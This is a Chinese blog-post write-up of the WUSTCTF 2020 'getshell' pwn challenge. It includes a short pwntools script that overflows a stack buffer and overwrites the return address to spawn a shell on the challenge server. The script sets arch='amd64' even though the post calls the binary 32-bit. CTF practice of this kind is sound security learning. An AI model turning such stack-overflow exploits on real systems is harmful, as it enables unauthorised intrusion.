NSSCTF(PWN)6

[WUSTCTF 2020]getshell

查看发现是32位文件

进入main发现vulnerable()双击进入

单纯的典型栈溢出

发现了system和binsh

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','20261')
main = 0x804851b
padding = b'a'*(0x18+0x4)
payload = padding + p32(main)
io.sendline(payload)
io.interactive()

题目虽然很简单,但是flag有点难找。flag在root下的ctf里面

感冒了今天偷个小懒........

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值